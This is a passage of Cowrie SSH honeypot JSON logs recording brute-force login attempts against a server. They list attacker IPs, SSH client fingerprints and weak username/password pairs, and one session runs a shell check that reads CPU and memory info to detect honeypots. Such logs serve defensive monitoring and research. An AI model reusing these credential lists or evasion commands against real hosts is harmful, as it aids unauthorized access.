2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:58:52.524418Z","src_ip":"196.251.115.108","session":"a316b5a30405"}
{"eventid":"cowrie.login.failed","username":"guest","password":"111111","message":"login attempt [guest/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T22:58:55.863386Z","src_ip":"196.251.115.108","session":"a316b5a30405"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:58:56.973189Z","src_ip":"196.251.115.108","session":"a316b5a30405"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":50242,"dst_ip":"1.2.3.4","dst_port":22,"session":"f63edc20055f","protocol":"ssh","message":"New connection: 196.251.115.108:50242 (1.2.3.4:22) [session: f63edc20055f]","sensor":"my-vps","timestamp":"2025-08-24T22:59:42.270681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:59:42.884931Z","src_ip":"196.251.115.108","session":"f63edc20055f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:59:42.885752Z","src_ip":"196.251.115.108","session":"f63edc20055f"}
{"eventid":"cowrie.login.failed","username":"guest","password":"1234567","message":"login attempt [guest/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T22:59:45.815086Z","src_ip":"196.251.115.108","session":"f63edc20055f"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:59:47.338515Z","src_ip":"196.251.115.108","session":"f63edc20055f"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":42318,"dst_ip":"1.2.3.4","dst_port":22,"session":"af767ba3ced6","protocol":"ssh","message":"New connection: 45.88.8.186:42318 (1.2.3.4:22) [session: af767ba3ced6]","sensor":"my-vps","timestamp":"2025-08-24T22:59:49.117321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:59:49.647322Z","src_ip":"45.88.8.186","session":"af767ba3ced6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T22:59:49.648831Z","src_ip":"45.88.8.186","session":"af767ba3ced6"}
{"eventid":"cowrie.login.success","username":"root","password":"44444444","message":"login attempt [root/44444444] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:59:51.705974Z","src_ip":"45.88.8.186","session":"af767ba3ced6"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:59:52.156719Z","src_ip":"45.88.8.186","session":"af767ba3ced6"}
{"eventid":"cowrie.session.connect","src_ip":"130.185.122.7","src_port":34906,"dst_ip":"1.2.3.4","dst_port":22,"session":"e833e30ff008","protocol":"ssh","message":"New connection: 130.185.122.7:34906 (1.2.3.4:22) [session: e833e30ff008]","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.596289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.597241Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.622149Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.698885Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:00:26.765389Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.766051Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.766486Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.768101Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.768858Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.770222Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.771217Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.772254Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.772820Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.773650Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.774790Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.807048Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.807907Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:00:26.808799Z","src_ip":"130.185.122.7","session":"e833e30ff008"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":52700,"dst_ip":"1.2.3.4","dst_port":22,"session":"96b7ae6167d3","protocol":"ssh","message":"New connection: 45.88.8.215:52700 (1.2.3.4:22) [session: 96b7ae6167d3]","sensor":"my-vps","timestamp":"2025-08-24T23:00:28.862499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:00:29.218598Z","src_ip":"45.88.8.215","session":"96b7ae6167d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T23:00:29.219319Z","src_ip":"45.88.8.215","session":"96b7ae6167d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Bhim@123","message":"login attempt [root/Bhim@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:00:30.906556Z","src_ip":"45.88.8.215","session":"96b7ae6167d3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:00:31.511714Z","src_ip":"45.88.8.215","session":"96b7ae6167d3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":59722,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd28addb2fdc","protocol":"ssh","message":"New connection: 196.251.115.108:59722 (1.2.3.4:22) [session: fd28addb2fdc]","sensor":"my-vps","timestamp":"2025-08-24T23:00:33.472344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:00:34.220101Z","src_ip":"196.251.115.108","session":"fd28addb2fdc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:00:34.220767Z","src_ip":"196.251.115.108","session":"fd28addb2fdc"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:00:37.458071Z","src_ip":"196.251.115.108","session":"fd28addb2fdc"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:00:38.805810Z","src_ip":"196.251.115.108","session":"fd28addb2fdc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":36536,"dst_ip":"1.2.3.4","dst_port":22,"session":"65861ca37155","protocol":"ssh","message":"New connection: 196.251.115.108:36536 (1.2.3.4:22) [session: 65861ca37155]","sensor":"my-vps","timestamp":"2025-08-24T23:01:22.453920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:01:22.753726Z","src_ip":"196.251.115.108","session":"65861ca37155"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:01:22.754437Z","src_ip":"196.251.115.108","session":"65861ca37155"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:01:26.126900Z","src_ip":"196.251.115.108","session":"65861ca37155"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:01:27.443804Z","src_ip":"196.251.115.108","session":"65861ca37155"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":48858,"dst_ip":"1.2.3.4","dst_port":22,"session":"aba12632dfc1","protocol":"ssh","message":"New connection: 196.251.115.108:48858 (1.2.3.4:22) [session: aba12632dfc1]","sensor":"my-vps","timestamp":"2025-08-24T23:02:11.492851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:02:11.992706Z","src_ip":"196.251.115.108","session":"aba12632dfc1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:02:11.993377Z","src_ip":"196.251.115.108","session":"aba12632dfc1"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456789","message":"login attempt [oracle/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:02:14.806182Z","src_ip":"196.251.115.108","session":"aba12632dfc1"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:02:16.045331Z","src_ip":"196.251.115.108","session":"aba12632dfc1"}
{"eventid":"cowrie.session.connect","src_ip":"107.189.19.100","src_port":51250,"dst_ip":"1.2.3.4","dst_port":22,"session":"bca6f270b20e","protocol":"ssh","message":"New connection: 107.189.19.100:51250 (1.2.3.4:22) [session: bca6f270b20e]","sensor":"my-vps","timestamp":"2025-08-24T23:02:32.836942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:02:38.611695Z","src_ip":"107.189.19.100","session":"bca6f270b20e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T23:02:38.612846Z","src_ip":"107.189.19.100","session":"bca6f270b20e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54624,"dst_ip":"1.2.3.4","dst_port":22,"session":"46059b7b3424","protocol":"ssh","message":"New connection: 217.72.205.35:54624 (1.2.3.4:22) [session: 46059b7b3424]","sensor":"my-vps","timestamp":"2025-08-24T23:02:42.788257Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:02:42.789439Z","src_ip":"217.72.205.35","session":"46059b7b3424"}
{"eventid":"cowrie.session.connect","src_ip":"87.106.35.227","src_port":54618,"dst_ip":"1.2.3.4","dst_port":22,"session":"7505fc10ff84","protocol":"ssh","message":"New connection: 87.106.35.227:54618 (1.2.3.4:22) [session: 7505fc10ff84]","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.237670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.238501Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
